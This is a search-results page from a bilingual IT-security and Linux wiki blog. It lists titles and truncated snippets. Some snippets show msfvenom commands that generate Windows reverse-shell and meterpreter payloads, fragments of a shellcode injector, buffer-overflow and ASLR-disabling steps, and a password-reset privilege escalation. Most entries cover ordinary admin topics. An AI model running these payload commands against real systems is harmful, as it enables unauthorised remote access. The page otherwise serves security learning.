Unten sind die Ergebnisse Ihrer Suche gelistet.
Shellcode Injection Part 1 @en:it-security:blog 31 Treffer, Zuletzt geändert: vor 12 Tagen sführt.((https://www.ired.team/offensive-security/code -injection-process-injection/process-injection)) I... rmat |
| > shell.c | Save to the file shell.c |
<code bash>
msfvenom -p windows/shell_reverse_tcp LHOST... ta_ga_nai -i 8 -b '\x00\x0d\x0a' -f c > shell.c
</code >
\\
\\
===== C++ Injector =====
We create a new ... = 540;
int main(int argc, char** argv) {
char* code ;
printf("#nosoc - expecttheunexpected");
co Shellcode Injection Teil 1 @it-security:blog 30 Treffer, Zuletzt geändert: vor 12 Tagen sführt.((https://www.ired.team/offensive-security/code -injection-process-injection/process-injection)) Z...
| > shell.c | Speichere in die Datei shell.c |
<code bash>
msfvenom -p windows/shell_reverse_tcp LHOST... ta_ga_nai -i 8 -b '\x00\x0d\x0a' -f c > shell.c
</code >
\\
\\
===== C++ Injector =====
Wir erstellen un... = 540;
int main(int argc, char** argv) {
char* code ;
printf("#nosoc - expecttheunexpected");
co Buffer overflow in the 64-bit stack - Part 3 @en:it-security:blog 40 Treffer, Zuletzt geändert: vor 3 Wochen ssue a system command when calling the function
<code gdb>
[-------------------------------------code -------------------------------------]
0x4011de <vuln... >: mov eax,0x0
0x4011f7 <vuln+134>: leave
</code >
\\
\\
===== Dependencies =====
* socat mod [[... ps://docs.pwntools.com/en/stable/install.html))
<code bash>
python3 -m pip install --upgrade pip
python Buffer overflow in the 64-bit stack - part 1 @en:it-security:blog 36 Treffer, Zuletzt geändert: vor 3 Wochen ileges.((https://www.ired.team/offensive-security/code -injection-process-injection/binary-exploitation/6... s://github.com/longld/peda/blob/master/README))
<code bash>
git clone https://github.com/longld/peda.gi... peda
echo "source ~/peda/peda.py" >> ~/.gdbinit
</code >
\\
\\
==== Deactivate ASLR ====
ASLR must be de... ivated so that memory areas are not randomised.
<code bash>
echo 0 | sudo tee /proc/sys/kernel/randomiz Buffer overflow in the 64-bit stack - Part 2 @en:it-security:blog 23 Treffer, Zuletzt geändert: vor 3 Wochen 80568|kompilierte debug binary]] from the blog.
<code bash>
br *vuln+73 # setze Breakpoint
r < i... "/bin/sh")
RIP: 0x400469 (<_init+25>: ret)
</code >
\\
\\
===== Dependencies =====
What is needed?
... fer_overflow_x64|Part 1]], we also need ropper.
<code bash>
sudo apt install ropper
</code >
\\
\\
===== Deactivate ASLR =====
ASLR must also be deactivated Privilege escalation: Windows admin thanks to Linux @en:it-security:blog 12 Treffer, Zuletzt geändert: vor 3 Wochen ntpw ====
Now we can install ''chntpw'' using:
<code bash>
sudo apt install chntpw
</code >
\\
\\
==== Find Windows partition ====
We are looking for the Windows partition.
<code bash>
sudo sfdisk -l
</code >
{{it-security:blog:screenshot_2024-03-14_145734.png|}}
\\
\\
In our examp FatCat Attack PoC @it-security:blog 14 Treffer, Zuletzt geändert: vor 3 Wochen um uns volle Rechte über ein System zu sichern.
<code text>
_____ _ ____ _
| ___|_ _| |_ ... | |_
|_| \__,_|\__|\____\__,_|\__|
Attack PoC
</code >
\\
\\
===== Beschreibung =====
{{page>vorlagen:... oad ====
* Metasploit starten
* cmd öffnen
<code dos>cmd</code >
* Payload generieren
<code dos>msfvenom -a x86 –platform windows -p windows/meterpre Buffer Overflow im 64-Bit Stack - Teil 1 @it-security:blog 36 Treffer, Zuletzt geändert: vor 3 Wochen langen.((https://www.ired.team/offensive-security/code -injection-process-injection/binary-exploitation/6... s://github.com/longld/peda/blob/master/README))
<code bash>
git clone https://github.com/longld/peda.gi... peda
echo "source ~/peda/peda.py" >> ~/.gdbinit
</code >
\\
\\
==== ASLR deaktivieren ====
ASLR muss dea... mit Speicherbereiche nicht randomisiert werden.
<code bash>
echo 0 | sudo tee /proc/sys/kernel/randomiz Buffer Overflow im 64-Bit Stack - Teil 2 @it-security:blog 22 Treffer, Zuletzt geändert: vor 3 Wochen 568|kompilierte Binary]] aus dem Blog debuggen.
<code bash>
br *vuln+73 # setze Breakpoint
r < i... "/bin/sh")
RIP: 0x400469 (<_init+25>: ret)
</code >
\\
\\
===== Abhängigkeiten =====
Was wird benöt... erflow_x64|Teil 1]], benötigen wir noch ropper.
<code bash>
sudo apt install ropper
</code >
\\
\\
===== ASLR deaktivieren =====
Auch hier muss ASLR wieder d Privilegien-Eskalation: Windows-Admin dank Linux @it-security:blog 12 Treffer, Zuletzt geändert: vor 3 Wochen zt können wir ''chntpw'' installieren, mittels:
<code bash>
sudo apt install chntpw
</code >
\\
\\
==== Windows Partition finden ====
Wir suchen die Windows Partition.
<code bash>
sudo sfdisk -l
</code >
{{:it-security:blog:screenshot_2024-03-14_145734.png|}}
\\
\\
In unserem Buffer Overflow im 64-Bit Stack - Teil 3 @it-security:blog 39 Treffer, Zuletzt geändert: vor 3 Wochen der Funktion einen Systembefehl absetzen können
<code gdb>
[-------------------------------------code -------------------------------------]
0x4011de <vuln... >: mov eax,0x0
0x4011f7 <vuln+134>: leave
</code >
\\
\\
===== Abhängigkeiten =====
* socat mod ... ps://docs.pwntools.com/en/stable/install.html))
<code bash>
python3 -m pip install --upgrade pip
python NumLock in Kali dauerhaft aktivieren @linux 8 Treffer, Zuletzt geändert: vor 3 Wochen ockx
* dconf-editor
===== Installation =====
<code bash>
sudo apt install numlockx dconf-editor
</code >
==== Parameter in dconf-editor setzen ====
* dconf-editor starten
<code bash>dconf-editor</code >
* navigiere zum Pfad
<code >/org/gnome/desktop/peripherals/keyboard/</code > OmegaPass / Passwort Generator @software 2 Treffer, Zuletzt geändert: vor 2 Monaten snnB könnten folgende Passworte erzeugt werden:
<code text>
TI682iv€~@55N
SH966hy?!~42T
NG629du@§@43F
</code > n8n Installation mit Docker Compose @linux 38 Treffer, Zuletzt geändert: vor 2 Monaten ==
==== 1.1 alte Versionen deinstallieren ====
<code bash>
sudo apt-get remove docker docker-engine docker.io containerd runc
</code >
==== 1.2 Repo Installation ====
=== 1.2.1 Update apt und HTTPS aktivieren ===
<code bash>
sudo apt-get update
sudo apt-get install... tc/apt/sources.list.d/docker.list > /dev/null
</code >
=== 1.2.2 Docker GPG Key hinzufügen ===
<cod Debian Fileserver mit Samba @linux 18 Treffer, Zuletzt geändert: vor 2 Monaten debian-linux/}}
===== Samba installieren =====
<code bash>
fserve ~:# apt-get install samba
Reading p... 0) ...
Done.
Starting Samba daemons: nmbd smbd.
</code >
===== Anlegen der Gruppen =====
<code bash>
fserve :~# addgroup smball
fserve :~# addgroup smbusers
fserve :~# addgroup smbadmins
</code >
===== Gruppenordner anlegen =====
<code bash>
Manuelles OpenSSL Update @archiv:linux 8 Treffer, Zuletzt geändert: vor 2 Monaten FatCat Attack PoC @en:it-security:blog 14 Treffer, Zuletzt geändert: vor 3 Monaten Formatting Syntax @wiki 29 Treffer, Zuletzt geändert: vor 3 Monaten Execute repair of Windows 10 @en:windows 4 Treffer, Zuletzt geändert: vor 3 Monaten Security on the net @en:windows 1 Treffer, Zuletzt geändert: vor 3 Monaten Wallabag installation under Debian @en:linux 8 Treffer, Zuletzt geändert: vor 3 Monaten Backing up the sshd @en:linux 12 Treffer, Zuletzt geändert: vor 3 Monaten Postfix Virtual Mailbox Limit @en:linux 8 Treffer, Zuletzt geändert: vor 3 Monaten n8n installation with Docker Compose @en:linux 38 Treffer, Zuletzt geändert: vor 3 Monaten n8n installation and operation @en:linux 8 Treffer, Zuletzt geändert: vor 3 Monaten Update UnrealIRCD @en:linux 22 Treffer, Zuletzt geändert: vor 3 Monaten Set up iptables @en:linux 10 Treffer, Zuletzt geändert: vor 3 Monaten Android - Firefox DNS over https @en:linux 6 Treffer, Zuletzt geändert: vor 3 Monaten Linux Commands Cheatsheet @en:linux 8 Treffer, Zuletzt geändert: vor 3 Monaten Backup Script Linux @en:linux 2 Treffer, Zuletzt geändert: vor 3 Monaten Autostart after Linux reboot @en:linux 6 Treffer, Zuletzt geändert: vor 3 Monaten Helpful NMAP scanner commands @en:it-security 30 Treffer, Zuletzt geändert: vor 3 Monaten SMB Hardening @en:it-security 14 Treffer, Zuletzt geändert: vor 3 Monaten Secure passwords @en:it-security 4 Treffer, Zuletzt geändert: vor 3 Monaten OSI layer cyber attacks @en:it-security 3 Treffer, Zuletzt geändert: vor 3 Monaten nmap SMBv1 Scan via Script @en:it-security 6 Treffer, Zuletzt geändert: vor 3 Monaten Group Managed Service Accounts @en:it-security 22 Treffer, Zuletzt geändert: vor 3 Monaten mIRC with SSL @en:irc 4 Treffer, Zuletzt geändert: vor 3 Monaten Group Managed Service Accounts @it-security 22 Treffer, Zuletzt geändert: vor 3 Monaten Set up iptables @en:linux:firewall 10 Treffer, Zuletzt geändert: vor 3 Monaten Ruhezustand im Remote Desktop @windows 4 Treffer, Zuletzt geändert: vor 3 Monaten Hibernation in the Remote Desktop @en:windows 4 Treffer, Zuletzt geändert: vor 3 Monaten App Entwicklung unter Windows 10 @windows 31 Treffer, Zuletzt geändert: vor 3 Monaten OSI Layer Cyber-Attacken @it-security 3 Treffer, Zuletzt geändert: vor 3 Monaten Delphi Codebase @en:archiv:coding:delphi 1 Treffer, Zuletzt geändert: vor 3 Monaten Emulated Debian under VMWare @en:linux 12 Treffer, Zuletzt geändert: vor 4 Monaten ausbau @en:vorlagen 2 Treffer, Zuletzt geändert: vor 4 Monaten Sichere Passwörter @it-security 4 Treffer, Zuletzt geändert: vor 4 Monaten Sicherheit im Netz @windows 1 Treffer, Zuletzt geändert: vor 4 Monaten Android - Firefox DNS over https @linux 6 Treffer, Zuletzt geändert: vor 4 Monaten Linux Befehle Cheatsheet @linux 8 Treffer, Zuletzt geändert: vor 4 Monaten postfix TLS Support @linux 2 Treffer, Zuletzt geändert: vor 4 Monaten Postfix Fehler: Relay Access Denied @linux 6 Treffer, Zuletzt geändert: vor 4 Monaten n8n Installation und Betrieb @linux 8 Treffer, Zuletzt geändert: vor 4 Monaten MySQL Passwörter ändern @linux 4 Treffer, Zuletzt geändert: vor 4 Monaten MySQL Operating system error number 13 @linux 2 Treffer, Zuletzt geändert: vor 4 Monaten MySQL Backup unter Linux @linux 18 Treffer, Zuletzt geändert: vor 4 Monaten manueller Froxlor Reload @linux 6 Treffer, Zuletzt geändert: vor 4 Monaten Firewall Regeln für Debian @linux 6 Treffer, Zuletzt geändert: vor 4 Monaten iptables einrichten @linux 10 Treffer, Zuletzt geändert: vor 4 Monaten mail Kommando nachrüsten @linux 6 Treffer, Zuletzt geändert: vor 4 Monaten Courier mit TLS Verbindung @linux 4 Treffer, Zuletzt geändert: vor 4 Monaten SSL für IMAP und POP3 @linux 4 Treffer, Zuletzt geändert: vor 4 Monaten Linux Backup mit tar @linux 16 Treffer, Zuletzt geändert: vor 4 Monaten Remote Server Backup @linux 6 Treffer, Zuletzt geändert: vor 4 Monaten Remote Server Backup NFS @linux 10 Treffer, Zuletzt geändert: vor 4 Monaten Linux Backup mit rsync @linux 8 Treffer, Zuletzt geändert: vor 4 Monaten SSL unter Apache einrichten @linux 11 Treffer, Zuletzt geändert: vor 4 Monaten SSL Zertifikate zuordnen @linux 2 Treffer, Zuletzt geändert: vor 4 Monaten Umlaute richtig darstellen @linux 8 Treffer, Zuletzt geändert: vor 4 Monaten Postfix Virtual Mailbox Limit @linux 8 Treffer, Zuletzt geändert: vor 4 Monaten Banner für den SSH Daemon erstellen @linux 10 Treffer, Zuletzt geändert: vor 4 Monaten Reparatur von Windows 10 ausführen @windows 4 Treffer, Zuletzt geändert: vor 4 Monaten Startpartition reparieren @windows 12 Treffer, Zuletzt geändert: vor 4 Monaten Eigene Namen im LAN anlegen @windows 6 Treffer, Zuletzt geändert: vor 4 Monaten Wallabag Installation unter Debian @linux 8 Treffer, Zuletzt geändert: vor 4 Monaten Sichern des sshd @linux 12 Treffer, Zuletzt geändert: vor 4 Monaten Update UnrealIRCD @linux 22 Treffer, Zuletzt geändert: vor 4 Monaten Backup Script Linux @linux 2 Treffer, Zuletzt geändert: vor 4 Monaten Autostart nach Linux Reboot @linux 6 Treffer, Zuletzt geändert: vor 4 Monaten SMB Hardening @it-security 14 Treffer, Zuletzt geändert: vor 4 Monaten nmap SMBv1 Scan via Script @it-security 6 Treffer, Zuletzt geändert: vor 4 Monaten Hilfreiche NMAP Scanner Kommandos @it-security 30 Treffer, Zuletzt geändert: vor 4 Monaten mIRC mit SSL @irc 4 Treffer, Zuletzt geändert: vor 4 Monaten Nickserv @irc 2 Treffer, Zuletzt geändert: vor 4 Monaten mIRC Perform optimieren @irc 10 Treffer, Zuletzt geändert: vor 4 Monaten IRC Channel eröffnen @irc 32 Treffer, Zuletzt geändert: vor 4 Monaten IRC Operator Befehle @irc 1 Treffer, Zuletzt geändert: vor 4 Monaten IRC Befehle 2 @irc 8 Treffer, Zuletzt geändert: vor 4 Monaten Kostenlos PDF Dateien erstellen @windows 4 Treffer, Zuletzt geändert: vor 4 Monaten Windows Bluescreen Analyse @windows 14 Treffer, Zuletzt geändert: vor 4 Monaten MySQL Backup under Linux @en:linux:mysql 18 Treffer, Zuletzt geändert: vor 4 Monaten Template Hilfe @vorlagen 14 Treffer, Zuletzt geändert: vor 4 Monaten NTLDR fehlt Fehlermeldung @windows 6 Treffer, Zuletzt geändert: vor 4 Monaten progress @en:vorlagen 2 Treffer, Zuletzt geändert: vor 4 Monaten Optimise mIRC Perform @en:irc 10 Treffer, Zuletzt geändert: vor 4 Monaten Open IRC channel @en:irc 32 Treffer, Zuletzt geändert: vor 4 Monaten Manual Froxlor Reload @en:linux:froxlor 6 Treffer, Zuletzt geändert: vor 4 Monaten PlayGround @en:playground 2 Treffer, Zuletzt geändert: vor 4 Monaten Execute repair of Windows 10 @en:windows:10 4 Treffer, Zuletzt geändert: vor 5 Monaten retrofit mail command @en:linux:debian 6 Treffer, Zuletzt geändert: vor 5 Monaten Courier with TLS connection @en:linux:courier 4 Treffer, Zuletzt geändert: vor 5 Monaten Bombs Script @en:archiv:coding:msl 2 Treffer, Zuletzt geändert: vor 5 Monaten ChaosDLL mIRC Script @en:software:chaosdll 5 Treffer, Zuletzt geändert: vor 5 Monaten Debian Fileserver with Samba @en:linux:samba 18 Treffer, Zuletzt geändert: vor 5 Monaten NTLDR missing Error message @en:windows 6 Treffer, Zuletzt geändert: vor 5 Monaten Set up SSL under Apache @en:linux:apache 11 Treffer, Zuletzt geändert: vor 5 Monaten progress @vorlagen 2 Treffer, Zuletzt geändert: vor 5 Monaten Manual OpenSSL update @en:linux 8 Treffer, Zuletzt geändert: vor 5 Monaten Nickserv @en:irc 2 Treffer, Zuletzt geändert: vor 5 Monaten Formatting Syntax @en:wiki 29 Treffer, Zuletzt geändert: vor 5 Monaten drafts @en:vorlagen 2 Treffer, Zuletzt geändert: vor 5 Monaten Archives under Linux @en:linux 22 Treffer, Zuletzt geändert: vor 5 Monaten Creating a bootable USB stick @en:windows 10 Treffer, Zuletzt geändert: vor 5 Monaten Template for user profile @en:vorlagen 2 Treffer, Zuletzt geändert: vor 5 Monaten HTTP Socket @archiv:coding:msl 3 Treffer, Zuletzt geändert: vor 6 Monaten n8n installation and operation @en:linux:n8n 8 Treffer, Zuletzt geändert: vor 6 Monaten Manual OpenSSL update @en:linux:openssl 8 Treffer, Zuletzt geändert: vor 6 Monaten Postfix trivial rewrite problem @en:linux 10 Treffer, Zuletzt geändert: vor 6 Monaten IRC Operator commands @en:irc 1 Treffer, Zuletzt geändert: vor 6 Monaten drafts @vorlagen 2 Treffer, Zuletzt geändert: vor 6 Monaten Linux backup with tar @en:linux:backup 16 Treffer, Zuletzt geändert: vor 6 Monaten OmegaPass / Password Generator @en:software 2 Treffer, Zuletzt geändert: vor 6 Monaten ChaosDLL mIRC Script @software:chaosdll 5 Treffer, Zuletzt geändert: vor 6 Monaten Linux backup with rsync @en:linux:backup 8 Treffer, Zuletzt geändert: vor 6 Monaten IRC commands 2 @en:irc 8 Treffer, Zuletzt geändert: vor 6 Monaten Android - Firefox DNS over https @en:android 6 Treffer, Zuletzt geändert: vor 6 Monaten Backup Script for Windows @en:software 6 Treffer, Zuletzt geändert: vor 6 Monaten Wiki special changes @wiki 10 Treffer, Zuletzt geändert: vor 6 Monaten Template help @en:vorlagen 10 Treffer, Zuletzt geändert: vor 6 Monaten Change MySQL passwords @en:linux:mysql 4 Treffer, Zuletzt geändert: vor 7 Monaten Windows Bluescreen Analysis @en:windows 14 Treffer, Zuletzt geändert: vor 7 Monaten Facebook Privatssphäre @archiv:tut 4 Treffer, Zuletzt geändert: vor 12 Monaten Bomben Script @archiv:coding:msl 2 Treffer, Zuletzt geändert: vor 14 Monaten R5 Online Hilfe @archiv:software:razor5 4 Treffer, Zuletzt geändert: vor 18 Monaten NNScript 4.22 Mod by PsyCore V3 @irc 4 Treffer, Zuletzt geändert: vor 18 Monaten SABnzbd @linux 4 Treffer, Zuletzt geändert: vor 4 Jahren Manuelles OpenSSL Update @linux 8 Treffer, Zuletzt geändert: vor 8 Jahren R5 Developer Page @archiv:software:razor5 1 Treffer, Zuletzt geändert: vor 11 Jahren Änderungen @archiv:software:razor5 1 Treffer, Zuletzt geändert: vor 12 Jahren StringHash @snippets 2 Treffer, Zuletzt geändert: vor 12 Jahren Threaded ServerSocket @snippets 4 Treffer, Zuletzt geändert: vor 12 Jahren Delphi Codebase @archiv:coding:delphi 1 Treffer, Zuletzt geändert: vor 12 Jahren Emuliertes Debian unter VMWare @linux 12 Treffer, Zuletzt geändert: vor 12 Jahren Delphi Snippets @archiv:coding:delphi 10 Treffer, Zuletzt geändert: vor 13 Jahren Facebook Privatssphäre @archiv:tut 12 Treffer, Zuletzt geändert: vor 13 Jahren Delphi Projects @archiv:coding:delphi 6 Treffer, Zuletzt geändert: vor 13 Jahren autoscript @irc:nnscript 4 Treffer, Zuletzt geändert: vor 15 Jahren Server Manager @archiv:coding:msl 2 Treffer, Zuletzt geändert: vor 15 Jahren Postfix Trivial Rewrite Problem @linux 10 Treffer, Zuletzt geändert: vor 15 Jahren PCFS - PsyCore Fun Script @archiv:coding:msl 6 Treffer, Zuletzt geändert: vor 15 Jahren Squid Proxy Server @linux 4 Treffer, Zuletzt geändert: vor 15 Jahren Vorlage für Userprofil @vorlagen 2 Treffer, Zuletzt geändert: vor 16 Jahren Acromancer Hack nnscript @irc:nnscript 10 Treffer, Zuletzt geändert: vor 16 Jahren delete @vorlagen 2 Treffer, Zuletzt geändert: vor 16 Jahren Archive unter Linux @linux 22 Treffer, Zuletzt geändert: vor 16 Jahren ausbau @vorlagen 2 Treffer, Zuletzt geändert: vor 16 Jahren QueryBlocker @archiv:coding:msl 2 Treffer, Zuletzt geändert: vor 16 Jahren